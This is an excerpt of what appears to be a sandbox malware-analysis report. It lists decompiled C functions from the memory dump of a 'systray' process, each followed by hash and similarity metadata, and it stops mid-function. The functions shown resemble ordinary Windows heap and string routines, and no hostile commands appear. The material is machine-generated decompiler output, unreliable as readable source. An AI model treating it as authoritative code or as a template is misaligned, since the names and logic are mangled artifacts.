                                            						if(_t65 != 0) {
                                            							L10:
                                            							if(_v177 != 0) {
                                            								if(_t57 != 0) {
                                            									L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
                                            								}
                                            							}
                                            							_t46 = _t65;
                                            							L12:
                                            							return E045DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
                                            						}
                                            						L7:
                                            						_t50 = _a4;
                                            						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
                                            						if(_t50 != 3) {
                                            							if(_t50 == 2) {
                                            								goto L8;
                                            							}
                                            							L9:
                                            							if(E045DF380(_t67 + 0xc, 0x4575138, 0x10) == 0) {
                                            								 *0x46860d8 = _t67;
                                            							}
                                            							goto L10;
                                            						}
                                            						L8:
                                            						_t64 = _t57 + 0x28;
                                            						E045C4F49(_t67, _t57 + 0x28);
                                            						goto L9;
                                            					}
                                            					_t65 = 0;
                                            					goto L7;
                                            				}
                                            				if(E045C4E70(0x46886b0, 0x45c5690, 0, 0) != 0) {
                                            					_t46 = E0459CCC0(_t56);
                                            					goto L12;
                                            				} else {
                                            					_t59 = 0xa0;
                                            					goto L3;
                                            				}
                                            			}





















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f83dadc54b71aecd02ee1a47b9ed0e9106112a00b00855f28878f092c71666f6
                                            • Instruction ID: 9c9e62601c9ec085dabe832cbde850a7d491a603367dd3c0478c9a6d326c2ffb
                                            • Opcode Fuzzy Hash: f83dadc54b71aecd02ee1a47b9ed0e9106112a00b00855f28878f092c71666f6
                                            • Instruction Fuzzy Hash: 3241F171A40318AFEB21DF54CD90FAAB7AAFB46704F01409DE8459B280E770FD40EA92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E045D3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                                            				intOrPtr _v8;
                                            				char _v12;
                                            				signed short** _t33;
                                            				short* _t38;
                                            				intOrPtr* _t39;
                                            				intOrPtr* _t41;
                                            				signed short _t43;
                                            				intOrPtr* _t47;
                                            				intOrPtr* _t53;
                                            				signed short _t57;
                                            				intOrPtr _t58;
                                            				signed short _t60;
                                            				signed short* _t61;
                                            
                                            				_t47 = __ecx;
                                            				_t61 = __edx;
                                            				_t60 = ( *__ecx & 0x0000ffff) + 2;
                                            				if(_t60 > 0xfffe) {
                                            					L22:
                                            					return 0xc0000106;
                                            				}
                                            				if(__edx != 0) {
                                            					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                                            						L5:
                                            						E045A7B60(0, _t61, 0x45711c4);
                                            						_v12 =  *_t47;
                                            						_v12 = _v12 + 0xfff8;
                                            						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                                            						E045A7B60(0xfff8, _t61,  &_v12);
                                            						_t33 = _a8;
                                            						if(_t33 != 0) {
                                            							 *_t33 = _t61;
                                            						}
                                            						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                                            						_t53 = _a12;
                                            						if(_t53 != 0) {
                                            							_t57 = _t61[2];
                                            							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                                            							while(_t38 >= _t57) {
                                            								if( *_t38 == 0x5c) {
                                            									_t41 = _t38 + 2;
                                            									if(_t41 == 0) {
                                            										break;
                                            									}
                                            									_t58 = 0;
                                            									if( *_t41 == 0) {
                                            										L19:
                                            										 *_t53 = _t58;
                                            										goto L7;
                                            									}
                                            									 *_t53 = _t41;
                                            									goto L7;
                                            								}
                                            								_t38 = _t38 - 2;
                                            							}
                                            							_t58 = 0;
                                            							goto L19;
                                            						} else {
                                            							L7:
                                            							_t39 = _a16;
                                            							if(_t39 != 0) {
                                            								 *_t39 = 0;
                                            								 *((intOrPtr*)(_t39 + 4)) = 0;
                                            								 *((intOrPtr*)(_t39 + 8)) = 0;
                                            								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                                            							}
                                            							return 0;
                                            						}
                                            					}
                                            					_t61 = _a4;
                                            					if(_t61 != 0) {
                                            						L3:
                                            						_t43 = L045B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                                            						_t61[2] = _t43;
                                            						if(_t43 == 0) {
                                            							return 0xc0000017;
                                            						}
                                            						_t61[1] = _t60;
                                            						 *_t61 = 0;
                                            						goto L5;
                                            					}
                                            					goto L22;
                                            				}
                                            				_t61 = _a4;
                                            				if(_t61 == 0) {
                                            					return 0xc000000d;
                                            				}
                                            				goto L3;
                                            			}

















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 12877ed1d95b92d332be0ae28327b10b2796d8b37bd5df76030780e98cd6287d
                                            • Instruction ID: 2bd0f07a7ff7eab5d1c2a1ba167e3bc5f49b97b0af0ac162da1fb8cd2f6aaa9c
                                            • Opcode Fuzzy Hash: 12877ed1d95b92d332be0ae28327b10b2796d8b37bd5df76030780e98cd6287d
                                            • Instruction Fuzzy Hash: CE31B271701625EBC7389F2DD841A6BBBE5FF95740B05846AE846CB390F730E840EB92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E04617016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                            				signed int _v8;
                                            				char _v588;
                                            				intOrPtr _v592;
                                            				intOrPtr _v596;
                                            				signed short* _v600;
                                            				char _v604;
                                            				short _v606;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				signed short* _t55;
                                            				void* _t56;
                                            				signed short* _t58;
                                            				signed char* _t61;
                                            				char* _t68;
                                            				void* _t69;
                                            				void* _t71;
                                            				void* _t72;
                                            				signed int _t75;
                                            
                                            				_t64 = __edx;
                                            				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                            				_v8 =  *0x468d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                            				_t55 = _a16;
                                            				_v606 = __ecx;
                                            				_t71 = 0;
                                            				_t58 = _a12;
                                            				_v596 = __edx;
                                            				_v600 = _t58;
                                            				_t68 =  &_v588;
                                            				if(_t58 != 0) {
                                            					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                            					if(_t55 != 0) {
                                            						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                            					}
                                            				}
                                            				_t8 = _t71 + 0x2a; // 0x28
                                            				_t33 = _t8;
                                            				_v592 = _t8;
                                            				if(_t71 <= 0x214) {
                                            					L6:
                                            					 *((short*)(_t68 + 6)) = _v606;
                                            					if(_t64 != 0xffffffff) {
                                            						asm("cdq");
                                            						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                            						 *((char*)(_t68 + 0x28)) = _a4;
                                            						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                            						 *((char*)(_t68 + 0x29)) = _a8;
                                            						if(_t71 != 0) {
                                            							_t22 = _t68 + 0x2a; // 0x2a
                                            							_t64 = _t22;
                                            							E04616B4C(_t58, _t22, _t71,  &_v604);
                                            							if(_t55 != 0) {
                                            								_t25 = _v604 + 0x2a; // 0x2a
                                            								_t64 = _t25 + _t68;
                                            								E04616B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                            							}
                                            							if(E045B7D50() == 0) {
                                            								_t61 = 0x7ffe0384;
                                            							} else {
                                            								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                            							}
                                            							_push(_t68);
                                            							_push(_v592 + 0xffffffe0);
                                            							_push(0x402);
                                            							_push( *_t61 & 0x000000ff);
                                            							E045D9AE0();
                                            						}
                                            					}
                                            					_t35 =  &_v588;
                                            					if( &_v588 != _t68) {
                                            						_t35 = L045B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                            					}
                                            					L16:
                                            					_pop(_t69);
                                            					_pop(_t72);
                                            					_pop(_t56);
                                            					return E045DB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                            				}
                                            				_t68 = L045B4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                            				if(_t68 == 0) {
                                            					goto L16;
                                            				} else {
                                            					_t58 = _v600;
                                            					_t64 = _v596;
                                            					goto L6;
                                            				}
                                            			}























                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5926e933670786d003859675507c042b0c83ec07aefe89d0fd878373b4cc9576
                                            • Instruction ID: 63f04325701e0606938e7787dbb4ea2b046f5a429ead540985cfd736acb10b78
                                            • Opcode Fuzzy Hash: 5926e933670786d003859675507c042b0c83ec07aefe89d0fd878373b4cc9576
                                            • Instruction Fuzzy Hash: 313193726047919BC320DF68C941A6AB7E5BFD8701F094A2DF895877A0E730F914C7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 68%
                                            			E045BC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                            				signed int* _v8;
                                            				char _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				signed char _t33;
                                            				signed char _t43;
                                            				signed char _t48;
                                            				signed char _t62;
                                            				void* _t63;
                                            				intOrPtr _t69;
                                            				intOrPtr _t71;
                                            				unsigned int* _t82;
                                            				void* _t83;
                                            
                                            				_t80 = __ecx;
                                            				_t82 = __edx;
                                            				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                            				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                            				if((_t33 & 0x00000001) != 0) {
                                            					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                            					if(E045B7D50() != 0) {
                                            						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            					} else {
                                            						_t43 = 0x7ffe0386;
                                            					}
                                            					if( *_t43 != 0) {
                                            						_t43 = E04668D34(_v8, _t80);
                                            					}
                                            					E045B2280(_t43, _t82);
                                            					if( *((char*)(_t80 + 0xdc)) == 0) {
                                            						E045AFFB0(_t62, _t80, _t82);
                                            						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                            						_t30 = _t80 + 0xd0; // 0xd0
                                            						_t83 = _t30;
                                            						E04668833(_t83,  &_v16);
                                            						_t81 = _t80 + 0x90;
                                            						E045AFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                            						_t63 = 0;
                                            						_push(0);
                                            						_push(_t83);
                                            						_t48 = E045DB180();
                                            						if(_a4 != 0) {
                                            							E045B2280(_t48, _t81);
                                            						}
                                            					} else {
                                            						_t69 = _v8;
                                            						_t12 = _t80 + 0x98; // 0x98
                                            						_t13 = _t69 + 0xc; // 0x575651ff
                                            						E045BBB2D(_t13, _t12);
                                            						_t71 = _v8;
                                            						_t15 = _t80 + 0xb0; // 0xb0
                                            						_t16 = _t71 + 8; // 0x8b000cc2
                                            						E045BBB2D(_t16, _t15);
                                            						E045BB944(_v8, _t62);
                                            						 *((char*)(_t80 + 0xdc)) = 0;
                                            						E045AFFB0(0, _t80, _t82);
                                            						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                            						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                            						 *(_t80 + 0xde) = 0;
                                            						if(_a4 == 0) {
                                            							_t25 = _t80 + 0x90; // 0x90
                                            							E045AFFB0(0, _t80, _t25);
                                            						}
                                            						_t63 = 1;
                                            					}
                                            					return _t63;
                                            				}
                                            				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                            				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                            				if(_a4 == 0) {
                                            					_t24 = _t80 + 0x90; // 0x90
                                            					E045AFFB0(0, __ecx, _t24);
                                            				}
                                            				return 0;
                                            			}

















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction ID: a1561830757934432dcec267ae65d0e297457b44d713f54025fc396bf987e339
                                            • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                            • Instruction Fuzzy Hash: 18310372B01547AEE705EBB4C490BEEF754BF82208F04815ED49897341EB347A19E7E5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 74%
                                            			E045CE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
                                            				intOrPtr* _v0;
                                            				signed char _v4;
                                            				signed int _v8;
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t37;
                                            				intOrPtr _t38;
                                            				signed int _t44;
                                            				signed char _t52;
                                            				void* _t54;
                                            				intOrPtr* _t56;
                                            				void* _t58;
                                            				char* _t59;
                                            				signed int _t62;
                                            
                                            				_t58 = __edx;
                                            				_push(0);
                                            				_push(4);
                                            				_push( &_v8);
                                            				_push(0x24);
                                            				_push(0xffffffff);
                                            				if(E045D9670() < 0) {
                                            					L045EDF30(_t54, _t58, _t35);
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					asm("int3");
                                            					_push(_t54);
                                            					_t52 = _v4;
                                            					if(_t52 > 8) {
                                            						_t37 = 0xc0000078;
                                            					} else {
                                            						_t38 =  *0x4687b9c; // 0x0
                                            						_t62 = _t52 & 0x000000ff;
                                            						_t59 = L045B4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
                                            						if(_t59 == 0) {
                                            							_t37 = 0xc0000017;
                                            						} else {
                                            							_t56 = _v0;
                                            							 *(_t59 + 1) = _t52;
                                            							 *_t59 = 1;
                                            							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
                                            							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
                                            							_t44 = _t62 - 1;
                                            							if(_t44 <= 7) {
                                            								switch( *((intOrPtr*)(_t44 * 4 +  &M045CE810))) {
                                            									case 0:
                                            										L6:
                                            										 *((intOrPtr*)(_t59 + 8)) = _a8;
                                            										goto L7;
                                            									case 1:
                                            										L13:
                                            										 *((intOrPtr*)(__edx + 0xc)) = _a12;
                                            										goto L6;
                                            									case 2:
                                            										L12:
                                            										 *((intOrPtr*)(__edx + 0x10)) = _a16;
                                            										goto L13;
                                            									case 3:
                                            										L11:
                                            										 *((intOrPtr*)(__edx + 0x14)) = _a20;
                                            										goto L12;
                                            									case 4:
                                            										L10:
                                            										 *((intOrPtr*)(__edx + 0x18)) = _a24;
                                            										goto L11;
                                            									case 5:
                                            										L9:
                                            										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
                                            										goto L10;
                                            									case 6:
                                            										L17:
                                            										 *((intOrPtr*)(__edx + 0x20)) = _a32;
                                            										goto L9;
                                            									case 7:
                                            										 *((intOrPtr*)(__edx + 0x24)) = _a36;
                                            										goto L17;
                                            								}
                                            							}
                                            							L7:
                                            							 *_a40 = _t59;
                                            							_t37 = 0;
                                            						}
                                            					}
                                            					return _t37;
                                            				} else {
                                            					_push(0x20);
                                            					asm("ror eax, cl");
                                            					return _a4 ^ _v8;
                                            				}
                                            			}


















                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • Opcode ID: b310028c7db88b03daffa889c741ad393f0e3d1df5bc55419ec98493a7601b3a
                                            • Instruction ID: 4c3e24a7619d009af10220758076c0fefe36e3ae148c1aa62ca7951124ba27c1
                                            • Opcode Fuzzy Hash: b310028c7db88b03daffa889c741ad393f0e3d1df5bc55419ec98493a7601b3a
                                            • Instruction Fuzzy Hash: CE318D75A54249EFD704CF58D841B9ABBE8FB19314F14865AF904CB341E635ED80DBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 67%
                                            			E045CBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				void* __ebx;
                                            				void* __edi;
                                            				intOrPtr _t22;
                                            				intOrPtr* _t41;
                                            				intOrPtr _t51;
                                            
                                            				_t51 =  *0x4686100; // 0x6
                                            				_v12 = __edx;
                                            				_v8 = __ecx;
                                            				if(_t51 >= 0x800) {
                                            					L12:
                                            					return 0;
                                            				} else {
                                            					goto L1;
                                            				}
                                            				while(1) {
                                            					L1:
                                            					_t22 = _t51;
                                            					asm("lock cmpxchg [ecx], edx");
                                            					if(_t51 == _t22) {
                                            						break;
                                            					}
                                            					_t51 = _t22;
                                            					if(_t22 < 0x800) {
                                            						continue;
                                            					}
                                            					goto L12;
                                            				}
                                            				E045B2280(0xd, 0x1609f1a0);
                                            				_t41 =  *0x46860f8; // 0x0
                                            				if(_t41 != 0) {
                                            					 *0x46860f8 =  *_t41;
                                            					 *0x46860fc =  *0x46860fc + 0xffff;
                                            				}
                                            				E045AFFB0(_t41, 0x800, 0x1609f1a0);
                                            				if(_t41 != 0) {
                                            					L6:
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
                                            					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
                                            					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
                                            					do {
                                            						asm("lock xadd [0x46860f0], ax");
                                            						 *((short*)(_t41 + 0x34)) = 1;
                                            					} while (1 == 0);
                                            					goto L8;
                                            				} else {
                                            					_t41 = L045B4620(0x4686100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
                                            					if(_t41 == 0) {
                                            						L11:
                                            						asm("lock dec dword [0x4686100]");
                                            						L8:
                                            						return _t41;
                                            					}
                                            					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
                                            					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
                                            					if(_t41 == 0) {
                                            						goto L11;
                                            					}
                                            					goto L6;
                                            				}
                                            			}











                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • Opcode ID: 7f2a185f739fec8b1b1887173208f73878132a9252027c8a048a12f8b1cafcb3
                                            • Instruction ID: 9f7df71194c0f244d5f267f924a8bf6916a2beb6f6d199ceef4425e1f0727cc9
                                            • Opcode Fuzzy Hash: 7f2a185f739fec8b1b1887173208f73878132a9252027c8a048a12f8b1cafcb3
                                            • Instruction Fuzzy Hash: 4E31FD32A00616AFDB11EF98E4817A673B4FB18310F00467DE845DB242FAB8FD05EB84
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 76%
                                            			E04599100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                            				signed int _t53;
                                            				signed int _t56;
                                            				signed int* _t60;
                                            				signed int _t63;
                                            				signed int _t66;
                                            				signed int _t69;
                                            				void* _t70;
                                            				intOrPtr* _t72;
                                            				void* _t78;
                                            				void* _t79;
                                            				signed int _t80;
                                            				intOrPtr _t82;
                                            				void* _t85;
                                            				void* _t88;
                                            				void* _t89;
                                            
                                            				_t84 = __esi;
                                            				_t70 = __ecx;
                                            				_t68 = __ebx;
                                            				_push(0x2c);
                                            				_push(0x466f6e8);
                                            				E045ED0E8(__ebx, __edi, __esi);
                                            				 *((char*)(_t85 - 0x1d)) = 0;
                                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                                            				if(_t82 == 0) {
                                            					L4:
                                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                            						E046688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                            					}
                                            					L5:
                                            					return E045ED130(_t68, _t82, _t84);
                                            				}
                                            				_t88 = _t82 -  *0x46886c0; // 0x4407b0
                                            				if(_t88 == 0) {
                                            					goto L4;
                                            				}
                                            				_t89 = _t82 -  *0x46886b8; // 0x0
                                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L4;
                                            				} else {
                                            					E045B2280(_t82 + 0xe0, _t82 + 0xe0);
                                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                            					__eflags =  *((char*)(_t82 + 0xe5));
                                            					if(__eflags != 0) {
                                            						E046688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                            						goto L12;
                                            					} else {
                                            						__eflags =  *((char*)(_t82 + 0xe4));
                                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                                            							 *((char*)(_t82 + 0xe4)) = 1;
                                            							_push(_t82);
                                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                                            							E045DAFD0();
                                            						}
                                            						while(1) {
                                            							_t60 = _t82 + 8;
                                            							 *(_t85 - 0x2c) = _t60;
                                            							_t68 =  *_t60;
                                            							_t80 = _t60[1];
                                            							 *(_t85 - 0x28) = _t68;
                                            							 *(_t85 - 0x24) = _t80;
                                            							while(1) {
                                            								L10:
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t84 = _t68;
                                            								 *(_t85 - 0x30) = _t80;
                                            								 *(_t85 - 0x24) = _t80 - 1;
                                            								asm("lock cmpxchg8b [edi]");
                                            								_t68 = _t84;
                                            								 *(_t85 - 0x28) = _t68;
                                            								 *(_t85 - 0x24) = _t80;
                                            								__eflags = _t68 - _t84;
                                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                                            								if(_t68 != _t84) {
                                            									continue;
                                            								}
                                            								__eflags = _t80 -  *(_t85 - 0x30);
                                            								if(_t80 !=  *(_t85 - 0x30)) {
                                            									continue;
                                            								}
                                            								__eflags = _t80;
                                            								if(_t80 == 0) {
                                            									break;
                                            								}
                                            								_t63 = 0;
                                            								 *(_t85 - 0x34) = 0;
                                            								_t84 = 0;
                                            								__eflags = 0;
                                            								while(1) {
                                            									 *(_t85 - 0x3c) = _t84;
                                            									__eflags = _t84 - 3;
                                            									if(_t84 >= 3) {
                                            										break;
                                            									}
                                            									__eflags = _t63;
                                            									if(_t63 != 0) {
                                            										L40:
                                            										_t84 =  *_t63;
                                            										__eflags = _t84;
                                            										if(_t84 != 0) {
                                            											_t84 =  *(_t84 + 4);
                                            											__eflags = _t84;
                                            											if(_t84 != 0) {
                                            												 *0x468b1e0(_t63, _t82);
                                            												 *_t84();
                                            											}
                                            										}
                                            										do {
                                            											_t60 = _t82 + 8;
                                            											 *(_t85 - 0x2c) = _t60;
                                            											_t68 =  *_t60;
                                            											_t80 = _t60[1];
                                            											 *(_t85 - 0x28) = _t68;
                                            											 *(_t85 - 0x24) = _t80;
                                            											goto L10;
                                            										} while (_t63 == 0);
                                            										goto L40;
                                            									}
                                            									_t69 = 0;
                                            									__eflags = 0;
                                            									while(1) {
                                            										 *(_t85 - 0x38) = _t69;
                                            										__eflags = _t69 -  *0x46884c0;
                                            										if(_t69 >=  *0x46884c0) {
                                            											break;
                                            										}
                                            										__eflags = _t63;
                                            										if(_t63 != 0) {
                                            											break;
                                            										}
                                            										_t66 = E04669063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                            										__eflags = _t66;
                                            										if(_t66 == 0) {
                                            											_t63 = 0;
                                            											__eflags = 0;
                                            										} else {
                                            											_t63 = _t66 + 0xfffffff4;
                                            										}
                                            										 *(_t85 - 0x34) = _t63;
                                            										_t69 = _t69 + 1;
                                            									}
                                            									_t84 = _t84 + 1;
                                            								}
                                            								__eflags = _t63;
                                            							}
                                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                            							 *((char*)(_t82 + 0xe5)) = 1;
                                            							 *((char*)(_t85 - 0x1d)) = 1;
                                            							L12:
                                            							 *(_t85 - 4) = 0xfffffffe;
                                            							E0459922A(_t82);
                                            							_t53 = E045B7D50();
                                            							__eflags = _t53;
                                            							if(_t53 != 0) {
                                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            							} else {
                                            								_t56 = 0x7ffe0386;
                                            							}
                                            							__eflags =  *_t56;
                                            							if( *_t56 != 0) {
                                            								_t56 = E04668B58(_t82);
                                            							}
                                            							__eflags =  *((char*)(_t85 - 0x1d));
                                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                                            								__eflags = _t82 -  *0x46886c0; // 0x4407b0
                                            								if(__eflags != 0) {
                                            									__eflags = _t82 -  *0x46886b8; // 0x0
                                            									if(__eflags == 0) {
                                            										_t79 = 0x46886bc;
                                            										_t72 = 0x46886b8;
                                            										goto L18;
                                            									}
                                            									__eflags = _t56 | 0xffffffff;
                                            									asm("lock xadd [edi], eax");
                                            									if(__eflags == 0) {
                                            										E04599240(_t68, _t82, _t82, _t84, __eflags);
                                            									}
                                            								} else {
                                            									_t79 = 0x46886c4;
                                            									_t72 = 0x46886c0;
                                            									L18:
                                            									E045C9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                            								}
                                            							}
                                            							goto L5;
                                            						}
                                            					}
                                            				}
                                            			}

                                            Memory Dump Source
                                            • Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true
                                            • Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp
                                            • Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_4570000_systray.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6aa618fdf6ee0eb2d6f2f590e71f43280b629b9d768787be6da59444d1758ad7
                                            • Instruction ID: 554f657afb449830260f4446e62411e40cc209e37c3718b3fed0f0ca2b46c7b8
                                            • Opcode Fuzzy Hash: 6aa618fdf6ee0eb2d6f2f590e71f43280b629b9d768787be6da59444d1758ad7
                                            • Instruction Fuzzy Hash: 27317CB1A016859FEF29EF68D4887ACB7F1BB88354F18854DD40567341D334BD80AB52
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E045D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                            				intOrPtr* _v0;
                                            				void* _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				char _v36;
                                            				void* _t38;
                                            				intOrPtr _t41;
                                            				void* _t44;
                                            				signed int _t45;
                                            				intOrPtr* _t49;
                                            				signed int _t57;
                                            				signed int _t58;
                                            				intOrPtr* _t59;
                                            				void* _t62;
                                            				void* _t63;
                                            				void* _t65;
                                            				void* _t66;
                                            				signed int _t69;
                                            				intOrPtr* _t70;
                                            				void* _t71;
                                            				intOrPtr* _t72;
                                            				intOrPtr* _t73;
                                            				char _t74;
                                            
                                            				_t65 = __edx;
                                            				_t57 = _a4;
                                            				_t32 = __ecx;
                                            				_v8 = __edx;
                                            				_t3 = _t32 + 0x14c; // 0x14c
                                            				_t70 = _t3;
                                            				_v16 = __ecx;
                                            				_t72 =  *_t70;
                                            				while(_t72 != _t70) {
                                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                            						L24:
